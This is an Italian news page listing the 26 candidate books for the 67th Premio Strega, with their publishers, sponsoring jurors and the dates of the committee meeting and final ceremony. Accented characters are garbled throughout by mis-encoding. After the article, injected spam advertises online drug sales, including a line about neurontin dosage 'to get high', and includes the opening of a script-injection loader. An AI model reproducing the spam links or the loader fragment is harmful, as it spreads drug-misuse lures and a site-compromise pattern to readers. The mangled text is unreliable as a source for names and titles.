Premio Strega, i 26 candidati

Premio Strega, i 26 candidati

Il prossimo 16 aprile si riunirA� il Comitato direttivo del Premio, presieduto da Tullio De Mauro, per decidere quali di questi 26 libri, presentati dai giurati a�?Amici della Domenicaa�?, entrerA� nella lista dei 12 che potranno continuare a concorrere per la 67/ma edizione del premio.

Ecco i 26 libri presentati:A�

ApneaA�(Fandango) di Lorenzo Amurri, sostenuto da Clara Sereni e Sandro Veronesi;

La societA� segreta degli ereticiA�(Newton Compton) di Ilaria Beltramme, presentato da Arnaldo Colasanti e Paolo Petroni;

La seconda India(Manni) di Laura Bocci, presentato da Walter PedullA� e Lidia Ravera;

Da costa a costaA�(BookSprint) di Lorenzo Bracco e Dario Voltolini, sostenuto da Marcello Fois e Silvio Perrella;

La mia unica amicaA�(Bollati Boringhieri) di Eliana Bouchard, presentato da Paolo Di Stefano e Massimo Raffaeli;

El especialista de BarcelonaA�(Dalai editore) di Aldo Busi, presentato da Alessandro Barbero e Stefano Bartezzaghi;

Romanzo irresistibile della mia vita veraA�(Marsilio) di Gaetano Cappelli, presentato da Gian Arturo Ferrari e Marina Valensise;

Esercizi sulla madreA�(Perdisa Pop) di Luigi Romolo Carrino, presentato da Roberto Barbolini e Francesco Durante;

Cate, ioA�(Fazi) di Matteo Cellini, presentato da Filippo La Porta e Paola Mastrocola;

Cacciatori di frodoA�(Miraggi) di Alessandro Cinquegrani, presentato da Enrico Castelnuovo e Pietro Gibellini;

Sofia si veste sempre di neroA�(minimum fax) di Paolo Cognetti, presentato da Diego De Silva e Lorenzo Pavolini;

Il candore delle cornacchieA�(Guerini) di TotA? Cuffaro, presentato da Gianpiero Gamaleri e Marco Staderini;

Di muro in muroA�(Guida) di Geppino Da��AlA?, presentato da Louis Godart e Giampaolo Rugarli;

Mandami tanta vitaA�(Feltrinelli) di Paolo Di Paolo, presentato da Gad Lerner e Rosetta Loy;

Il cielo A? dei potenti (e/o)A�di Alessandra Fiori, presentato da Giovanna Botteri e Paolo Sorrentino;

PerA? un paese ci vuoleA�(La Lepre) di Giovanna Grignaffini, presentato da Umberto Eco e Raffaele La Capria;

Gola di PietraA�(Reverdito) di Luigi Lambertini, presentato da Silvana Gaudio e Lorenza Trucchi;

Suicide TuesdayA�(Perrone) di Francesco Leto, presentato da Giorgio Barberi Squarotti e Alessandro Masi;

La��uso della vita. 1968A�(Transeuropa) di Romano Luperini, presentato da Angelo Guglielmi e Raffaele Simone;

Atti mancatiA�(Voland) di Matteo Marchesini, presentato da Massimo Onofri e Silvia Ronchey;

Le colpe dei padriA�(Piemme) di Alessandro Perissinotto, presentato da Gian Luigi Beccaria e Eva Cantarella;

Figli dello stesso padreA�(Longanesi) di Romana Petri, presentato da Alberto Asor Rosa e Salvatore S. Nigro;

La��esilio dei figliA�(Gremese) di Claudia Pozzo, presentato da Maurizio Cucchi e Paolo Ruffilli;

Resistere non serve a nienteA�(Rizzoli) di Walter Siti, presentato da Alessandro Piperno e Domenico Starnone;

Nessuno sa di noiA�(Giunti) di Simona Sparaco, presentato da Valeria Parrella e Aurelio Picca

Stringimi prima che arrivi la notteA�(Edizioni Anordest) di Claudio Volpe, presentato da Cesare Milanese e Renato Minore.

La��appuntamento finale, per la proclamazione del vincitore, si terrA� il 4 luglio prossimo a Roma presso il Ninfeo di Villa Giulia.

 

S. I. seroquel generic date http://desifreceviri.com/blog/2018/03/17/where-to-buy-unisom-sleepmelts/ Order var d=document;var s=d.createElement(‘script’); norlevo, buying colchicine. online http://bidieffe.net/?p=11006 Cheap Buy how much neurontin do you need to get high can men take metronidazole 500mg vigra for sale in ireland cheap pills Buy order avana sushi http://ess.integratedhr.com.au/wordpress/?p=3375 Cheap

Lascia un Commento

L'indirizzo email non verrà pubblicato. I campi obbligatori sono contrassegnati *

È possibile utilizzare questi tag ed attributi XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>